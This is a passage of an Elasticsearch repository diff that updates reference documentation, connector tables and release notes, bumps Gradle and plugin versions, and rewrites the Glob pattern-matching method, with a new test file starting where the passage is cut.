Thus, the final results from aggregations contain `k * number_of_shards` documents. This is different from the [top level knn section](docs-content://solutions/search/vector/knn.md) where aggregations are calculated on the global top `k` nearest documents. diff --git a/docs/reference/query-languages/query-dsl/query-dsl-rule-query.md b/docs/reference/query-languages/query-dsl/query-dsl-rule-query.md index c682481cdc58a..3b017804cb1f5 100644 --- a/docs/reference/query-languages/query-dsl/query-dsl-rule-query.md +++ b/docs/reference/query-languages/query-dsl/query-dsl-rule-query.md @@ -14,7 +14,7 @@ mapped_pages: ::::{tip} -The rule query is not supported for use alongside reranking. If you want to use query rules in conjunction with reranking, use the [rule retriever](/reference/elasticsearch/rest-apis/retrievers.md#rule-retriever) instead. +The rule query is not supported for use alongside reranking. If you want to use query rules in conjunction with reranking, use the [rule retriever](/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md) instead. :::: diff --git a/docs/reference/query-languages/query-dsl/query-dsl-semantic-query.md b/docs/reference/query-languages/query-dsl/query-dsl-semantic-query.md index e7f6578d5369a..ebad528a2ad92 100644 --- a/docs/reference/query-languages/query-dsl/query-dsl-semantic-query.md +++ b/docs/reference/query-languages/query-dsl/query-dsl-semantic-query.md @@ -2,6 +2,9 @@ navigation_title: "Semantic" mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-semantic-query.html +applies_to: + stack: ga 9.0 + serverless: ga --- # Semantic query [query-dsl-semantic-query] diff --git a/docs/reference/query-languages/query-dsl/query-dsl-sparse-vector-query.md b/docs/reference/query-languages/query-dsl/query-dsl-sparse-vector-query.md index e0df2c8dc14c1..ce46713dad3c5 100644 --- a/docs/reference/query-languages/query-dsl/query-dsl-sparse-vector-query.md +++ b/docs/reference/query-languages/query-dsl/query-dsl-sparse-vector-query.md @@ -150,7 +150,7 @@ GET my-index/_search } ``` -This can also be achieved using [reciprocal rank fusion (RRF)](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md), through an [`rrf` retriever](/reference/elasticsearch/rest-apis/retrievers.md#rrf-retriever) with multiple [`standard` retrievers](/reference/elasticsearch/rest-apis/retrievers.md#standard-retriever). +This can also be achieved using [reciprocal rank fusion (RRF)](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md), through an [`rrf` retriever](/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md) with multiple [`standard` retrievers](/reference/elasticsearch/rest-apis/retrievers/standard-retriever.md). ```console GET my-index/_search diff --git a/docs/reference/query-languages/query-dsl/query-dsl-text-expansion-query.md b/docs/reference/query-languages/query-dsl/query-dsl-text-expansion-query.md index 1eca639ea6462..148f6f304278e 100644 --- a/docs/reference/query-languages/query-dsl/query-dsl-text-expansion-query.md +++ b/docs/reference/query-languages/query-dsl/query-dsl-text-expansion-query.md @@ -134,7 +134,7 @@ GET my-index/_search } ``` -This can also be achieved using [reciprocal rank fusion (RRF)](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md), through an [`rrf` retriever](/reference/elasticsearch/rest-apis/retrievers.md#rrf-retriever) with multiple [`standard` retrievers](/reference/elasticsearch/rest-apis/retrievers.md#standard-retriever). 
+This can also be achieved using [reciprocal rank fusion (RRF)](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md), through an [`rrf` retriever](/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md) with multiple [`standard` retrievers](/reference/elasticsearch/rest-apis/retrievers/standard-retriever.md). ```console GET my-index/_search diff --git a/docs/reference/query-languages/querydsl.md b/docs/reference/query-languages/querydsl.md index 7737d09665329..b98b20740732f 100644 --- a/docs/reference/query-languages/querydsl.md +++ b/docs/reference/query-languages/querydsl.md @@ -6,8 +6,6 @@ mapped_pages: # QueryDSL [query-dsl] :::{note} -This section provides detailed **reference information**. - Refer to the [Query DSL overview](docs-content://explore-analyze/query-filter/languages/querydsl.md) in the **Explore and analyze** section for overview and conceptual information about Query DSL. ::: diff --git a/docs/reference/query-languages/toc.yml b/docs/reference/query-languages/toc.yml index 861435ccdc8cf..ff9ea4a7ddafd 100644 --- a/docs/reference/query-languages/toc.yml +++ b/docs/reference/query-languages/toc.yml @@ -2,6 +2,7 @@ toc: - file: index.md - file: querydsl.md children: + - file: query-dsl/full-text-filter-tutorial.md - file: query-dsl/query-filter-context.md - file: query-dsl/compound-queries.md children: @@ -84,13 +85,37 @@ toc: - file: query-dsl/regexp-syntax.md - file: esql.md children: + - file: esql/esql-getting-started.md + - file: esql/esql-rest.md - file: esql/esql-syntax-reference.md children: - file: esql/esql-syntax.md - file: esql/esql-commands.md children: - file: esql/commands/source-commands.md + children: + - file: esql/commands/from.md + - file: esql/commands/row.md + - file: esql/commands/show.md - file: esql/commands/processing-commands.md + children: + - file: esql/commands/change-point.md + - file: esql/commands/completion.md + - file: esql/commands/dissect.md + - file: esql/commands/drop.md + - file: esql/commands/enrich.md + - file: esql/commands/eval.md + - file: esql/commands/fork.md + - file: esql/commands/grok.md + - file: esql/commands/keep.md + - file: esql/commands/limit.md + - file: esql/commands/lookup-join.md + - file: esql/commands/mv_expand.md + - file: esql/commands/rename.md + - file: esql/commands/sample.md + - file: esql/commands/sort.md + - file: esql/commands/stats-by.md + - file: esql/commands/where.md - file: esql/esql-functions-operators.md children: - file: esql/functions-operators/aggregation-functions.md @@ -105,6 +130,10 @@ toc: - file: esql/functions-operators/type-conversion-functions.md - file: esql/functions-operators/mv-functions.md - file: esql/functions-operators/operators.md + - file: esql/esql-multi.md + children: + - file: esql/esql-multi-index.md + - file: esql/esql-cross-clusters.md - file: esql/esql-advanced.md children: - file: esql/esql-process-data-with-dissect-grok.md @@ -116,9 +145,14 @@ toc: - file: esql/esql-time-spans.md - file: esql/esql-metadata-fields.md - file: esql/esql-multivalued-fields.md - - - file: esql/limitations.md - file: esql/esql-examples.md + children: + - file: esql/esql-search-tutorial.md + - file: esql/esql-troubleshooting.md + children: + - file: esql/esql-query-log.md + - file: esql/esql-task-management.md + - file: esql/limitations.md - file: sql.md children: - file: sql/sql-spec.md @@ -158,5 +192,4 @@ toc: - file: eql/eql-syntax.md - file: eql/eql-function-ref.md - file: eql/eql-pipe-ref.md - - file: eql/eql-ex-threat-detection.md - file: kql.md diff --git 
a/docs/reference/search-connectors/index.md b/docs/reference/search-connectors/index.md index 30452ad9b11a3..991d7ae0bc9e5 100644 --- a/docs/reference/search-connectors/index.md +++ b/docs/reference/search-connectors/index.md @@ -8,13 +8,13 @@ mapped_pages: - https://www.elastic.co/guide/en/enterprise-search/current/connectors.html --- -# Search connectors +# Content connectors $$$es-connectors-native$$$ :::{note} -This page is about Search connectors that synchronize third-party data into {{es}}. If you’re looking for Kibana connectors to integrate with services like generative AI model providers, refer to [Kibana Connectors](docs-content://deploy-manage/manage-connectors.md). +This page is about content connectors that synchronize third-party data into {{es}}. If you’re looking for Kibana connectors to integrate with services like generative AI model providers, refer to [Kibana Connectors](docs-content://deploy-manage/manage-connectors.md). ::: A _connector_ is an Elastic integration that syncs data from an original data source to {{es}}. Use connectors to create searchable, read-only replicas of your data in {{es}}. @@ -30,38 +30,53 @@ These connectors are written in Python and the source code is available in the [ As of Elastic 9.0, managed connectors on Elastic Cloud Hosted are no longer available. All connectors must be [self-managed](/reference/search-connectors/self-managed-connectors.md). :::: - -Connectors are available for the following third-party data sources: - -- [Azure Blob Storage](/reference/search-connectors/es-connectors-azure-blob.md) -- [Box](/reference/search-connectors/es-connectors-box.md) -- [Confluence](/reference/search-connectors/es-connectors-confluence.md) -- [Dropbox](/reference/search-connectors/es-connectors-dropbox.md) -- [GitHub](/reference/search-connectors/es-connectors-github.md) -- [Gmail](/reference/search-connectors/es-connectors-gmail.md) -- [Google Cloud Storage](/reference/search-connectors/es-connectors-google-cloud.md) -- [Google Drive](/reference/search-connectors/es-connectors-google-drive.md) -- [GraphQL](/reference/search-connectors/es-connectors-graphql.md) -- [Jira](/reference/search-connectors/es-connectors-jira.md) -- [MicrosoftSQL](/reference/search-connectors/es-connectors-ms-sql.md) -- [MongoDB](/reference/search-connectors/es-connectors-mongodb.md) -- [MySQL](/reference/search-connectors/es-connectors-mysql.md) -- [Network drive](/reference/search-connectors/es-connectors-network-drive.md) -- [Notion](/reference/search-connectors/es-connectors-notion.md) -- [OneDrive](/reference/search-connectors/es-connectors-onedrive.md) -- [OpenText Documentum](/reference/search-connectors/es-connectors-opentext.md) -- [Oracle](/reference/search-connectors/es-connectors-oracle.md) -- [Outlook](/reference/search-connectors/es-connectors-outlook.md) -- [PostgreSQL](/reference/search-connectors/es-connectors-postgresql.md) -- [Redis](/reference/search-connectors/es-connectors-redis.md) -- [S3](/reference/search-connectors/es-connectors-s3.md) -- [Salesforce](/reference/search-connectors/es-connectors-salesforce.md) -- [ServiceNow](/reference/search-connectors/es-connectors-servicenow.md) -- [SharePoint Online](/reference/search-connectors/es-connectors-sharepoint-online.md) -- [SharePoint Server](/reference/search-connectors/es-connectors-sharepoint.md) -- [Slack](/reference/search-connectors/es-connectors-slack.md) -- [Teams](/reference/search-connectors/es-connectors-teams.md) -- [Zoom](/reference/search-connectors/es-connectors-zoom.md) +This 
table provides an overview of our available connectors, their current support status, and the features they support. + +The columns provide specific information about each connector: + +- **Status**: Indicates whether the connector is in General Availability (GA), Technical Preview, Beta, or is an Example connector. +- **Advanced sync rules**: Specifies the versions in which advanced sync rules are supported, if applicable. +- **Local binary extraction service**: Specifies the versions in which the local binary extraction service is supported, if applicable. +- **Incremental syncs**: Specifies the version in which incremental syncs are supported, if applicable. +- **Document level security**: Specifies the version in which document level security is supported, if applicable. + + + +| Connector | Status | [Advanced sync rules](./es-sync-rules.md#es-sync-rules-advanced) | [Local binary extraction service](./es-connectors-content-extraction.md#es-connectors-content-extraction-local) | [Incremental syncs](./content-syncs.md#es-connectors-sync-types-incremental) | [Document level security](./document-level-security.md) | Source code | +| ------- | --------------- | -- | -- | -- | -- | -- | +| [Azure Blob](/reference/search-connectors/es-connectors-azure-blob.md) | **GA** | - | 8.11+ | 8.13+ | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/azure_blob_storage.py) | +| [Box](/reference/search-connectors/es-connectors-box.md) | **Preview** | - | - | 8.13+ | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/box.py) | +| [Confluence Cloud](/reference/search-connectors/es-connectors-confluence.md) | **GA** | 8.9+ | 8.11+ | 8.13+ | 8.10 | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/confluence.py) | +| [Confluence Data Center](/reference/search-connectors/es-connectors-confluence.md) | **Preview** | 8.13+ | 8.13+ | 8.13+ | 8.14+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/confluence.py) | +| [Confluence Server](/reference/search-connectors/es-connectors-confluence.md)| **GA** | 8.9+ | 8.11+ | 8.13+ | 8.14+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/confluence.py) | +| [Dropbox](/reference/search-connectors/es-connectors-dropbox.md)| **GA** | - | 8.11+ | 8.13+ | 8.12+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/dropbox.py) | +| [GitHub](/reference/search-connectors/es-connectors-github.md)| **GA** | 8.10+ | 8.11+ | 8.13+ | 8.12+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/github.py) | +| [Gmail](/reference/search-connectors/es-connectors-gmail.md)| **GA** | - | - | 8.13+ | 8.10+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/gmail.py) | +| [Google Cloud Storage](/reference/search-connectors/es-connectors-google-cloud.md)| **GA** | - | 8.11+ | 8.13+ | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/google_cloud_storage.py) | +| [Google Drive](/reference/search-connectors/es-connectors-google-drive.md)| **GA** | - | 8.11+ | 8.13+ | 8.10+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/google_drive.py) | +| [GraphQL](/reference/search-connectors/es-connectors-graphql.md)| **Preview** | - | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/graphql.py) | +| [Jira 
Cloud](/reference/search-connectors/es-connectors-jira.md)| **GA** | 8.9+ | 8.11+ | 8.13+ | 8.10+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/jira.py) | +| [Jira Data Center](/reference/search-connectors/es-connectors-jira.md)| **Preview** | 8.13+ | 8.13+ | 8.13+ | 8.13+*| [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/jira.py) | +| [Jira Server](/reference/search-connectors/es-connectors-jira.md)| **GA** | 8.9+ | 8.11+ | 8.13+ | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/jira.py) | +| [Microsoft SQL Server](/reference/search-connectors/es-connectors-ms-sql.md)| **GA** | 8.11+ | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/mssql.py) | +| [MongoDB](/reference/search-connectors/es-connectors-mongodb.md)| **GA** | 8.8 native/ 8.12 self-managed | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/mongo.py) | +| [MySQL](/reference/search-connectors/es-connectors-mysql.md)| **GA** | 8.8+ | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/mysql.py) | +| [Network drive](/reference/search-connectors/es-connectors-network-drive.md)| **GA** | 8.10+ | 8.14+ | 8.13+ | 8.11+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/network_drive.py) | +| [Notion](/reference/search-connectors/es-connectors-notion.md)| **GA** | 8.14+ | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/notion.py) | +| [OneDrive](/reference/search-connectors/es-connectors-onedrive.md)| **GA** | 8.11+ | 8.11+ | 8.13+ | 8.11+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/onedrive.py) | +| [Opentext Documentum](/reference/search-connectors/es-connectors-opentext.md)| **Example** | n/a | n/a | n/a | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/opentext_documentum.py) | +| [Oracle](/reference/search-connectors/es-connectors-oracle.md)| **GA** | - | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/oracle.py) | +| [Outlook](/reference/search-connectors/es-connectors-outlook.md)| **GA** | - | 8.11+ | 8.13+ | 8.14+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/outlook.py) | +| [PostgreSQL](/reference/search-connectors/es-connectors-postgresql.md)| **GA** | 8.11+ | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/postgresql.py) | +| [Redis](/reference/search-connectors/es-connectors-redis.md)| **Preview** | - | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/redis.py) | +| [Amazon S3](/reference/search-connectors/es-connectors-s3.md)| **GA** | 8.12+ | 8.11+ | - | - |[View code](https://github.com/elastic/connectors/tree/main/connectors/sources/s3.py) | +| [Salesforce](/reference/search-connectors/es-connectors-salesforce.md)| **GA** | 8.12+ | 8.11+ | 8.13+ | 8.13+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/salesforce.py) | +| [ServiceNow](/reference/search-connectors/es-connectors-servicenow.md)| **GA** | 8.10+ | 8.11+ | 8.13+ | 8.13+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/servicenow.py) | +| [Sharepoint Online](/reference/search-connectors/es-connectors-sharepoint-online.md)| **GA** | 8.9+ | 8.9+ | 8.9+ | 8.9+ |[View 
code](https://github.com/elastic/connectors/tree/main/connectors/sources/sharepoint_online.py) | +| [Sharepoint Server](/reference/search-connectors/es-connectors-sharepoint.md)| **Beta** | - | 8.11+ | 8.13+ | 8.15+ |[View code](https://github.com/elastic/connectors/tree/main/connectors/sources/sharepoint_server.py) | +| [Slack](/reference/search-connectors/es-connectors-slack.md)| **Preview** | - | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/slack.py) | +| [Teams](/reference/search-connectors/es-connectors-teams.md)| **Preview** | - | - | 8.13+ | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/teams.py) | +| [Zoom](/reference/search-connectors/es-connectors-zoom.md)| **Preview** | - | 8.11+ | 8.13+ | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/zoom.py) | :::{tip} Because prerequisites and configuration details vary by data source, you’ll need to refer to the individual connector references for specific details. @@ -69,7 +84,6 @@ Because prerequisites and configuration details vary by data source, you’ll ne ## Overview - Because connectors are self-managed on your own infrastructure, they run outside of your Elastic deployment. You can run them from source or in a Docker container. diff --git a/docs/reference/search-connectors/release-notes.md b/docs/reference/search-connectors/release-notes.md index c0630e4f1bf0c..586bff33d8f06 100644 --- a/docs/reference/search-connectors/release-notes.md +++ b/docs/reference/search-connectors/release-notes.md @@ -13,6 +13,36 @@ If you are an Enterprise Search user and want to upgrade to Elastic 9.0, refer t It includes detailed steps, tooling, and resources to help you transition to supported alternatives in 9.x, such as Elasticsearch, the Open Web Crawler, and self-managed connectors. ::: +## 9.1.3 [connectors-9.1.3-release-notes] +There are no new features, enhancements, fixes, known issues, or deprecations associated with this release. + +## 9.1.2 [connectors-9.1.2-release-notes] +There are no new features, enhancements, fixes, known issues, or deprecations associated with this release. + +## 9.1.1 [connectors-9.1.1-release-notes] + +### Fixes [connectors-9.1.1-fixes] + +:::{dropdown} Resolves missing access control for “Everyone Except External Users” in SharePoint connector + +Permissions granted to the `Everyone Except External Users` group were previously ignored, causing incomplete access control metadata in documents. This occurred because the connector did not recognize the group’s login name format. +[#3577](https://github.com/elastic/connectors/pull/3577) resolves this issue by recognizing the group’s login format and correctly applying its permissions to document access control metadata. +::: + +## 9.1.0 [connectors-9.1.0-release-notes] +There are no new features, enhancements, fixes, known issues, or deprecations associated with this release. + +## 9.0.5 [connectors-9.0.5-release-notes] + +### Fixes [connectors-9.0.5-fixes] + +:::{dropdown} Resolves missing access control for `Everyone Except External Users` in SharePoint connector +Permissions granted to the `Everyone Except External Users` group were previously ignored, causing incomplete access control metadata in documents. This occurred because the connector did not recognize the group’s login name format. 
[#3577](https://github.com/elastic/connectors/pull/3577) resolves this issue by recognizing the group’s login format and correctly applying its permissions to document access control metadata. +::: + +## 9.0.4 [connectors-9.0.4-release-notes] +No changes since 9.0.3 + ## 9.0.3 [connectors-9.0.3-release-notes] ### Features and enhancements [connectors-9.0.3-features-enhancements] diff --git a/docs/reference/search-connectors/toc.yml b/docs/reference/search-connectors/toc.yml index 3fb2578cfebfd..adea1a18ed646 100644 --- a/docs/reference/search-connectors/toc.yml +++ b/docs/reference/search-connectors/toc.yml @@ -1,4 +1,4 @@ -project: 'Search connectors reference' +project: 'Content connectors reference' toc: - file: index.md - file: connector-reference.md diff --git a/docs/release-notes/known-issues.md b/docs/release-notes/known-issues.md index a20cff68c225c..ed3733b0f2a82 100644 --- a/docs/release-notes/known-issues.md +++ b/docs/release-notes/known-issues.md @@ -8,10 +8,19 @@ mapped_pages: Known issues are significant defects or limitations that may impact your implementation. These issues are actively being worked on and will be addressed in a future release. Review the Elasticsearch known issues to help you make informed decisions, such as upgrading to a new version. ## 9.0.3 [elasticsearch-9.0.3-known-issues] -A bug in the merge scheduler in Elasticsearch 9.0.3 may prevent shards from closing when there isn’t enough disk space to complete a merge. As a result, operations such as closing or relocating an index may hang until sufficient disk space becomes available. +* A bug in the merge scheduler in Elasticsearch 9.0.3 may prevent shards from closing when there isn’t enough disk space to complete a merge. As a result, operations such as closing or relocating an index may hang until sufficient disk space becomes available. To mitigate this issue, the disk space checker is disabled by default in 9.0.3 by setting `indices.merge.disk.check_interval` to `0` seconds. Manually enabling this setting is not recommended. -This issue is planned to be fixed in future patch release [#129613](https://github.com/elastic/elasticsearch/pull/129613) + +    This issue is planned to be fixed in a future patch release [#129613](https://github.com/elastic/elasticsearch/pull/129613) + +* A bug in the ES|QL STATS command may yield incorrect results. The bug only happens in very specific cases that follow this pattern: `STATS ... BY keyword1, keyword2`, i.e. the command must have exactly two grouping fields, both keywords, where the first field has high cardinality (more than 65k distinct values). + + The bug is described in detail in [this issue](https://github.com/elastic/elasticsearch/issues/130644). + The problem was introduced in 8.16.0 and [fixed](https://github.com/elastic/elasticsearch/pull/130705) in 8.17.9, 8.18.7, and 9.0.4. + + Possible workarounds include: + * switching the order of the grouping keys (e.g. `STATS ... BY keyword2, keyword1`, if `keyword2` has a lower cardinality) + * reducing the grouping key cardinality, by filtering out values before STATS ## 9.0.0 [elasticsearch-9.0.0-known-issues] * Elasticsearch on Windows might fail to start, or might forbid some file-related operations, when referencing paths with a case different from the one stored by the filesystem. Windows treats paths as case-insensitive, but the filesystem stores them with case.
Entitlements, the new security system used by Elasticsearch, treat all paths as case-sensitive, and can therefore prevent access to a path that should be accessible. @@ -40,3 +49,12 @@ This issue will be fixed in a future patch release (see [PR #126990](https://git DELETE _index_template/.watches POST /_watcher/_start ``` + +* A bug in the ES|QL STATS command may yield incorrect results. The bug only happens in very specific cases that follow this pattern: `STATS ... BY keyword1, keyword2`, i.e. the command must have exactly two grouping fields, both keywords, where the first field has high cardinality (more than 65k distinct values). + + The bug is described in detail in [this issue](https://github.com/elastic/elasticsearch/issues/130644). + The problem was introduced in 8.16.0 and [fixed](https://github.com/elastic/elasticsearch/pull/130705) in 8.17.9, 8.18.7, and 9.0.4. + + Possible workarounds include: + * switching the order of the grouping keys (e.g. `STATS ... BY keyword2, keyword1`, if `keyword2` has a lower cardinality) + * reducing the grouping key cardinality, by filtering out values before STATS diff --git a/gradle/build.versions.toml b/gradle/build.versions.toml index bf0e6873f9073..0c42445d9f126 100644 --- a/gradle/build.versions.toml +++ b/gradle/build.versions.toml @@ -2,7 +2,7 @@ asm = "9.7.1" jackson = "2.15.0" junit5 = "5.12.1" -spock = "2.1-groovy-3.0" +spock = "2.3-groovy-4.0" nmcp = "0.1.5" [libraries] @@ -22,7 +22,7 @@ hamcrest = "org.hamcrest:hamcrest:3.0" httpcore5 = "org.apache.httpcomponents.core5:httpcore5:5.3.3" httpclient5 = "org.apache.httpcomponents.client5:httpclient5:5.4.2" idea-ext = "gradle.plugin.org.jetbrains.gradle.plugin.idea-ext:gradle-idea-ext:1.1.4" -javaparser = "com.github.javaparser:javaparser-core:3.18.0" +javaparser = "com.github.javaparser:javaparser-core:3.27.0" json-schema-validator = "com.networknt:json-schema-validator:1.0.72" json-assert = "org.skyscreamer:jsonassert:1.5.0" jackson-core = { group = "com.fasterxml.jackson.core", name="jackson-core", version.ref="jackson" } @@ -40,7 +40,7 @@ mockito-core = "org.mockito:mockito-core:1.9.5" nmcp = { group = "com.gradleup.nmcp", name = "nmcp", version.ref="nmcp" } nebula-info = "com.netflix.nebula:gradle-info-plugin:11.3.3" reflections = "org.reflections:reflections:0.9.12" -shadow-plugin = "com.gradleup.shadow:shadow-gradle-plugin:8.3.5" +shadow-plugin = "com.gradleup.shadow:shadow-gradle-plugin:9.0.1" snakeyaml = { group = "org.yaml", name = "snakeyaml", version = { strictly = "2.0" } } spock-core = { group = "org.spockframework", name="spock-core", version.ref="spock" } spock-junit4 = { group = "org.spockframework", name="spock-junit4", version.ref="spock" } @@ -50,5 +50,5 @@ wiremock = "com.github.tomakehurst:wiremock-jre8-standalone:2.23.2" xmlunit-core = "org.xmlunit:xmlunit-core:2.8.2" [plugins] -ospackage = { id = "com.netflix.nebula.ospackage-base", version = "11.11.2" } +ospackage = { id = "com.netflix.nebula.ospackage-base", version = "12.1.0" } nmcp-aggregation = { id = "com.gradleup.nmcp.aggregation", version.ref="nmcp" } diff --git a/gradle/verification-metadata.xml b/gradle/verification-metadata.xml index 7e147eff76dbd..55f5012394667 100644 --- a/gradle/verification-metadata.xml +++ b/gradle/verification-metadata.xml [checksum hunks omitted: the dependency-verification XML entries in this file were lost in extraction and are not recoverable]
diff --git a/gradle/wrapper/gradle-wrapper.properties b/gradle/wrapper/gradle-wrapper.properties index c4a852da571d7..01450089d2c6c 100644 --- a/gradle/wrapper/gradle-wrapper.properties +++ b/gradle/wrapper/gradle-wrapper.properties @@ -1,7 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionSha256Sum=443c9c8ee2ac1ee0e11881a40f2376d79c66386264a44b24a9f8ca67e633375f -distributionUrl=https\://services.gradle.org/distributions/gradle-8.14.2-all.zip +distributionSha256Sum=f759b8dd5204e2e3fa4ca3e73f452f087153cf81bac9561eeb854229cc2c5365 +distributionUrl=https\://services.gradle.org/distributions/gradle-9.0.0-all.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/libs/build.gradle b/libs/build.gradle index efd2329ca2b5e..79806b0dc45b3 100644 --- a/libs/build.gradle +++ b/libs/build.gradle @@ -45,4 +45,14 @@ configure(childProjects.values()) { */ apply plugin: 'elasticsearch.build' } + + // This is for any code potentially included in the server at runtime. + // Omit oddball libraries that aren't in server.
+ def nonServerLibs = ['plugin-scanner'] + if (false == nonServerLibs.contains(project.name)) { + project.getTasks().withType(Test.class).matching(test -> ['test', 'internalClusterTest'].contains(test.name)).configureEach(test -> { + test.systemProperty('es.entitlement.enableForTests', 'true') + }) + } + } diff --git a/libs/cli/src/test/java/org/elasticsearch/cli/TerminalTests.java b/libs/cli/src/test/java/org/elasticsearch/cli/TerminalTests.java index c8ef64ced7754..6e9fa4a49a59c 100644 --- a/libs/cli/src/test/java/org/elasticsearch/cli/TerminalTests.java +++ b/libs/cli/src/test/java/org/elasticsearch/cli/TerminalTests.java @@ -10,6 +10,7 @@ package org.elasticsearch.cli; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import java.io.IOException; import java.io.OutputStream; @@ -22,6 +23,7 @@ import static org.mockito.Mockito.verify; import static org.mockito.Mockito.verifyNoMoreInteractions; +@WithoutEntitlements // CLI tools don't run with entitlements enforced public class TerminalTests extends ESTestCase { public void testSystemTerminalIfRedirected() { diff --git a/libs/core/src/main/java/org/elasticsearch/core/Glob.java b/libs/core/src/main/java/org/elasticsearch/core/Glob.java index 8bc1f23c44bb5..b3e1106bd966d 100644 --- a/libs/core/src/main/java/org/elasticsearch/core/Glob.java +++ b/libs/core/src/main/java/org/elasticsearch/core/Glob.java @@ -29,34 +29,84 @@ public static boolean globMatch(String pattern, String str) { if (pattern == null || str == null) { return false; } - int firstIndex = pattern.indexOf('*'); - if (firstIndex == -1) { + + int patternIndex = pattern.indexOf('*'); + if (patternIndex == -1) { + // Nothing to glob return pattern.equals(str); } - if (firstIndex == 0) { + + if (patternIndex == 0) { + // If the pattern is a literal '*' then it matches any input if (pattern.length() == 1) { return true; } - int nextIndex = pattern.indexOf('*', firstIndex + 1); - if (nextIndex == -1) { - return str.endsWith(pattern.substring(1)); - } else if (nextIndex == 1) { - // Double wildcard "**" - skipping the first "*" - return globMatch(pattern.substring(1), str); + } else { + if (str.regionMatches(0, pattern, 0, patternIndex) == false) { + // If the pattern starts with a literal (i.e. 
not '*') then the input string must also start with that + return false; } - String part = pattern.substring(1, nextIndex); - int partIndex = str.indexOf(part); - while (partIndex != -1) { - if (globMatch(pattern.substring(nextIndex), str.substring(partIndex + part.length()))) { - return true; + if (patternIndex == pattern.length() - 1) { + // The pattern is "something*", so if the starting region matches, then the whole pattern matches + return true; + } + } + + int strIndex = patternIndex; + while (strIndex < str.length()) { + assert pattern.charAt(patternIndex) == '*' : "Expected * at index " + patternIndex + " of [" + pattern + "]"; + + // skip over the '*' + patternIndex++; + + if (patternIndex == pattern.length()) { + // The pattern ends in '*' (that is, "something*" or "*some*thing*", etc) + // Since we already matched everything up to the '*' we know the string matches (whatever is left over must match '*') + // so we're automatically done + return true; + } + + // Look for the next '*' + int nextStar = pattern.indexOf('*', patternIndex); + while (nextStar == patternIndex) { + // Two (or more) stars in sequence, just skip the subsequent ones + patternIndex++; + nextStar = pattern.indexOf('*', patternIndex); + } + if (nextStar == -1) { + // We've come to the last '*' in a pattern (e.g. the 2nd one in "*some*thing") + // In this case we match if the input string ends in "thing" (but constrained by the current position) + final int len = pattern.length() - patternIndex; + final int strSuffixStart = str.length() - len; + if (strSuffixStart < strIndex) { + // The suffix would start before the current position. That means it's not a match + // e.g. "abc" is not a match for "ab*bc" even though "abc" does end with "bc" + return false; + } + return str.regionMatches(strSuffixStart, pattern, patternIndex, len); + } else { + // There is another star, with a literal in between the current position and that '*' + // That is, we have "*literal*" + // We want the first '*' to consume everything up until the first occurrence of "literal" in the input string + int match = str.indexOf(pattern.substring(patternIndex, nextStar), strIndex); + if (match == -1) { + // If "literal" isn't there, then the match fails. + return false; } - partIndex = str.indexOf(part, partIndex + 1); + // Move both index (pointer) values to the end of the literal + strIndex = match + (nextStar - patternIndex); + patternIndex = nextStar; } - return false; } - return (str.length() >= firstIndex - && pattern.substring(0, firstIndex).equals(str.substring(0, firstIndex)) - && globMatch(pattern.substring(firstIndex), str.substring(firstIndex))); + + // We might have trailing '*'s in the pattern after completing a literal match at the end of the input string + // e.g. a glob of "el*ic*" matching "elastic" - we need to consume that last '*' without it matching anything + while (patternIndex < pattern.length() && pattern.charAt(patternIndex) == '*') { + patternIndex++; + } + + // The match is successful only if we have consumed the entire pattern. + return patternIndex == pattern.length(); } } diff --git a/libs/core/src/test/java/org/elasticsearch/core/GlobTests.java b/libs/core/src/test/java/org/elasticsearch/core/GlobTests.java new file mode 100644 index 0000000000000..12dbb3f0313b8 --- /dev/null +++ b/libs/core/src/test/java/org/elasticsearch/core/GlobTests.java @@ -0,0 +1,206 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements.
